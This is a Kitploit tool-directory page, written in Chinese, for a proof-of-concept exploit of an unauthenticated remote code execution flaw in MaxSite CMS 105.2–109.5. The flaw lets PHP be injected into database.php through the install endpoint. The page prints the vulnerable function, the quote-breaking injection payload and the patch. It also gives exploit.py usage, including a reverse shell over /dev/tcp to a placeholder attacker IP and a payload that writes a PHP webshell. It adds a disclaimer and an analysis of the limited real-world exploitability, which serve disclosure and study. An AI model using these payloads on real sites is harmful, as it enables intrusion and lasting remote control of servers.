Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-70553-PoC — 针对 CVE-2026-70553 的概念验证漏洞利用程序,可通过 install 端点向 database.php 注入持久性 PHP 代码,从而在 MaxSite CMS 中实现未认证的远程代码执行(RCE)。 | Kitploit
工具/GitHubGitHub/woshidashabi1126/cve-2026-70553-poc
Payload生成漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubwoshidashabi1126/cve-2026-70553-poc

CVE-2026-70553-PoC

针对 CVE-2026-70553 的概念验证漏洞利用程序,可通过 install 端点向 database.php 注入持久性 PHP 代码,从而在 MaxSite CMS 中实现未认证的远程代码执行(RCE)。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
111个月前尚未审核

CVE-2026-70553 - MaxSite CMS 未认证远程代码执行漏洞

CVE CVSS

CVE-2026-70553 概念验证:通过安装端点向 database.php 持久化注入 PHP 代码,实现未认证远程代码执行。


免责声明

本 PoC 仅用于教育和授权安全研究目的。作者不对因使用此代码造成的任何滥用或损害负责。仅对您拥有或已获得明确书面授权的系统进行测试。


漏洞概述

MaxSite CMS 105.2 至 109.5 版本的安装端点存在严重的未认证远程代码执行漏洞。db_dbprefix 参数在未经过滤的情况下直接拼接到 PHP 代码中,攻击者可以向 application/config/database.php 注入任意 PHP 语句。由于该文件在每次请求时都会被包含,注入的代码可实现持久化 RCE。


影响版本

  • MaxSite CMS 105.2 - 109.5
  • 修复版本:109.6(2026-06-08)

技术细节

漏洞根因

在 install/installer/functions.php 中,newDatabase() 函数构造 database.php 内容时:

root@kitploit:~
function newDatabase($PV)
{
    if (file_exists(MSODIR . 'application/config/database.php-distr')) {
        $file = file_get_contents(MSODIR . 'application/config/database.php-distr');
        
        // ... 其他替换 ...
        
        // 漏洞点:$PV['db_dbprefix'] 无任何过滤直接拼接
        $file = str_replace('$db[\'default\'][\'dbprefix\'] = \'mso_\';', 
                            '$db[\'default\'][\'dbprefix\'] = \'' . $PV['db_dbprefix'] . '\';', 
                            $file);
        
        file_put_contents(MSODIR . 'application/config/database.php', $file);
        return false;
    }
    // ...
}

利用机制

注入如下 payload:

root@kitploit:~
db_dbprefix=mso_'; system('id'); //

生成的 database.php 变成:

root@kitploit:~
$db['default']['dbprefix'] = 'mso_'; system('id'); //';

单引号闭合字符串,注入任意 PHP 代码。

补丁(109.6)

修复方式是增加检查,防止重复安装:

root@kitploit:~
if (file_exists(MSODIR . 'application/config/database.php-distr')
    and
    !file_exists(MSODIR . 'application/config/database.php'))  // 新增检查
{
    // 仅当 database.php 不存在时才创建
}

使用方法

安装

root@kitploit:~
git clone https://github.com/woshidashabi1126/CVE-2026-70553-PoC.git
cd CVE-2026-70553-PoC
pip3 install requests

基础用法

root@kitploit:~
# 检测目标的 install 端点是否可访问
python3 exploit.py http://target.com --check-only

# 使用默认 payload 利用(创建 poc_test.txt)
python3 exploit.py http://target.com

# 自定义 payload:反弹 shell
python3 exploit.py http://target.com \
  --cmd 'system("bash -c \"bash -i >& /dev/tcp/攻击者IP/9001 0>&1\"");'

# 自定义 payload:写入 webshell
python3 exploit.py http://target.com \
  --cmd 'file_put_contents("shell.php", "<?php system(\$_GET[0]); ?>");'

选项

root@kitploit:~
--cmd           要注入的 PHP 代码(默认:文件写入测试)
--check-only    仅检测 install 端点是否可访问
--db-host       数据库主机(默认:localhost)
--db-user       数据库用户名(默认:test)
--db-pass       数据库密码(默认:test)
--db-name       数据库名(默认:test)

利用限制

关键提示: 此漏洞在实战场景中存在严重的实际限制。

前置条件

  1. Install 端点必须可访问(/install/ 目录未删除)
  2. 数据库表必须不存在(全新安装或数据库被清空)
    • newDatabase() 函数仅在表不存在时才调用
    • 这在 install/installer/post.php 中通过 checkTableExists() 检查

为什么大多数站点不可利用

  • 生产环境的站点已完成安装 → 表已存在 → newDatabase() 永远不会被调用
  • 即使 /install/ 可访问,通往注入的代码路径被表存在检查阻断
  • 我们的批量扫描发现 仅约 24% 的站点 install 端点可访问,且 0% 实际可利用(因为数据库表均已创建)

实战可利用性

  • 理论评级: 严重(9.8 CVSS)
  • 实际评级: 极低
  • 现实可打目标画像:
    • 安装过程中途中断
    • 数据库被手动清空但代码仍在
    • 全新测试/开发实例(非生产环境)

本地复现

在受控环境中验证此漏洞:

搭建漏洞环境

root@kitploit:~
# 1. 下载漏洞版本
wget https://github.com/maxsite/cms/archive/refs/tags/109.5.zip
unzip 109.5.zip && cd cms-109.5

# 2. 启动 PHP 内置服务器
php -S 127.0.0.1:8000

# 3. 在另一个终端运行利用脚本
python3 exploit.py http://127.0.0.1:8000

验证注入

root@kitploit:~
# 检查 database.php 是否被修改
cat application/config/database.php | grep dbprefix

# 应看到注入的代码:
# $db['default']['dbprefix'] = 'mso_'; file_put_contents(...); //';

# 触发执行
curl http://127.0.0.1:8000/

# 验证测试文件已创建
curl http://127.0.0.1:8000/poc_test.txt

参考资料

  • CVE-2026-70553 - CVE Record
  • NVD Entry
  • VulnCheck Advisory
  • MaxSite CMS GitHub
  • Patch Commit (109.6)

时间线

  • 2026-06-08:MaxSite CMS 109.6 发布修复版本
  • 2026-08-04:CVE-2026-70553 公开
  • 2026-08-06:PoC 发布

致谢

  • 发现者: Amir Aliu & Enrik Mustafa (VulnCheck)
  • PoC 开发: Security Researcher
  • 厂商: MaxSite CMS Team

许可证

本项目基于 MIT 许可证发布。详见 LICENSE。


注意: 始终遵循负责任披露原则,仅对获得授权的系统进行测试。

下载工具